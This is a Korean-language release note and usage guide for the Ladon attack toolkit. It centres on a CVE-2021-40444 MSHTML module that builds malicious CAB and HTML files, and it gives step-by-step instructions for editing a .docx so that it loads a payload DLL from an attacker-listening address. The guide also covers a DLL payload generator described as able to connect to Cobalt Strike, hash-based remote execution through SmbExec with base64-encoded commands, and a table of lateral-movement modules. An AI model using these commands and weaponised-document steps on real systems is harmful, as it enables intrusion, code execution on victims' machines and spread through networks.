
CVE-2021-40444 MSHTML 원격 코드 실행을 위한 익스플로잇 툴킷으로, DLL 페이로드 생성, Office 문서 제작, 침투 테스트용 수평 이동 모듈(SmbExec, WmiExec)을 갖추고 있습니다.
2021년 9월 8일, NSFOCUS CERT는 Microsoft가 MSHTML 원격 코드 실행 취약점에 대한 보안 공지를 발표했음을 모니터링했습니다. 공격자는 악성 ActiveX 컨트롤을 제작하여 브라우저 렌더링 엔진을 제공하는 Microsoft Office 문서에서 사용하도록 만들 수 있으며, 사용자가 악성 문서를 열도록 유도한 후 대상 시스템에서 해당 사용자 권한으로 임의 코드를 실행할 수 있습니다. Microsoft는 공지에서 해당 취약점이 이미 야생에서 악용되고 있음을 확인했으며, 관련 사용자는 보호 조치를 취해야 합니다.
MSHTML(Trident라고도 함)은 Microsoft의 Internet Explorer 브라우저 엔진으로, Word, Excel 또는 PowerPoint 문서에서 웹 호스팅 콘텐츠를 렌더링하기 위해 Office 응용 프로그램에서도 사용됩니다. ActiveX 컨트롤은 Microsoft COM 아키텍처의 산물로, Windows의 Office 제품군과 IE 브라우저에서 광범위하게 사용되며, ActiveX 컨트롤을 사용하여 MSHTML 구성 요소와 상호 작용할 수 있습니다.
Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 포함
Ladon 8.9 2021.9.14 [+]CVE-2021-40444 Microsoft MSHTML 원격 코드 실행 취약점, Office 문서 악용 모듈 영향을 받는 버전: Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 포함 [+]CmdDll cmd를 DLL로 변환 (Win 시스템 0day 취약점 DLL 실행 명령 페이로드, 직접 powershell로 CobaltStrike에 연결 가능) 오버플로 취약점(예: MS17010, 로컬 권한 상승 CVE-2021-1675 등) 및 비오버플로 취약점(예: 최신 Office 취약점 CVE-2021-40444 등)
Ladon 8.8 2021.9.11 [+]SmbExec NTLM-HASH 비대화식 실행, 출력 없음 [u]GetInfo Vmware 가상 머신 정보 추가 [u]OsScan Vigor Router 라우터 식별 추가 [u]Xen\VBOX\Hybrid\Parallels 가상 머신 식별 추가 [+]GetInfo cmdkey, RrpLog, 드라이버 설치, 소프트웨어 목록, 최근 액세스 파일 등 추가 [+]GetInfo GUID, CPUID, 하드 디스크 ID, 자동 시작 백도어 탐지(DLL 하이재킹, 레지스트리 등) 추가 [+]GetInfo2 WMI 패치 정보 획득 추가 [+]기본 정보 C 드라이브 남은 공간이 2GB 미만일 때 강조 표시 추가
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
실제 필요에 따라 해당 CMD 명령을 사용하여 DLL을 생성하십시오. 예제는 계산기를 실행합니다.
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
참고: 이 모듈은 Ladon40.exe를 사용해야 합니다.
Win10 x64 Office 2019
아무 평가판이나 사용해도 됩니다. 정품 인증할 필요 없습니다. IMG 파일을 다운로드한 경우 IMG를 ZIP으로 변경한 후 압축을 풀어 설치하면 됩니다.
대상이 Win10 X64 시스템이므로 64비트 DLL을 사용합니다. 명령: Ladon CVE-2021-40444 MakeCab sc64.dll
HTML을 생성할 때 URL은 Ladon이 수신 대기하는 주소를 가리켜야 합니다.
샘플은 9월 10일에 이미 K8 서클에 게시되었습니다. docx 확장자를 cab 또는 zip으로 변경한 후 rels 파일을 편집하여 Ladon이 수신 대기하는 주소의 poc.html을 가리키게 한 후 저장하고 다시 .docx로 이름을 변경합니다.
Win10에서 doc 파일을 실행할 때 Ladon 수신을 통해 전체 요청 과정을 확인할 수 있습니다. docx가 먼저 html에 액세스하고, 취약점이 트리거되어 우리가 패키징한 CAB 파일을 로드하고, CPL을 통해 INF 설치를 실행하여 우리의 DLL을 로드합니다. DLL 기능은 계산기를 실행하는 것으로 시연됩니다.
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA
Cobalt Strike의 셸에서 SmbExec을 실행할 때 공백 따옴표가 있는 매개변수를 전달해야 하는 경우 CS 이스케이프에 문제가 있어 일반 CMD 명령을 사용하기 번거롭습니다. 따라서 CS에서 사용하기 쉽도록 b64cmd 매개변수를 추가했습니다 (이 방법은 몇 달 전 BypassUac에서도 사용되었습니다. 많은 사람들이 왜 이렇게 하는지, 바로 CMD 명령을 사용하면 안 되는지 궁금해하지만, 한 단계의 암호화를 거쳐야 합니다. 실행하려는 CMD 명령에 많은 이스케이프가 포함되어 있을 때 CS 이스케이프를 거쳐 정상 CMD 명령을 얻는 것이 매우 번거롭다는 것을 알게 됩니다). b64cmd 명령은 LadonGUI 8.2 이후 버전에서 Base64Unicode 암호화를 사용하여 생성할 수 있습니다.
PowerLadon: https://github.com/k8gege/PowerLadon 이전 버전: http://github.com/k8gege/Ladon/releases 7.0 버전: http://k8gege.org/Download 8.9 버전: K8 서클
| ID | 모듈 이름 | 기능 설명 | 사용법 |
|---|
| 1 | WmiExec | 135 포트 명령 실행 | http://k8gege.org/Ladon/WinShell.html |
| 2 | PsExec | 445 포트 명령 실행 | http://k8gege.org/Ladon/WinShell.html |
| 3 | AtExec | 445 포트 명령 실행 | http://k8gege.org/Ladon/WinShell.html |
| 4 | SshExec | 22 포트 명령 실행 | http://k8gege.org/Ladon/WinShell.html |
| 5 | JspShell | Jsp 한 줄 명령 실행 | http://k8gege.org/p/ladon_cs_shell.html |
| 6 | WebShell | WebShell 명령 실행 | http://k8gege.org/Ladon/webshell.html |
| 7 | WinrmExec | 5895 포트 명령 실행 | http://k8gege.org/Ladon/WinrmExec.html |
| 8 | SmbExec | 445 포트 HASH 명령 실행 | http://k8gege.org/Ladon/SmbExec.html |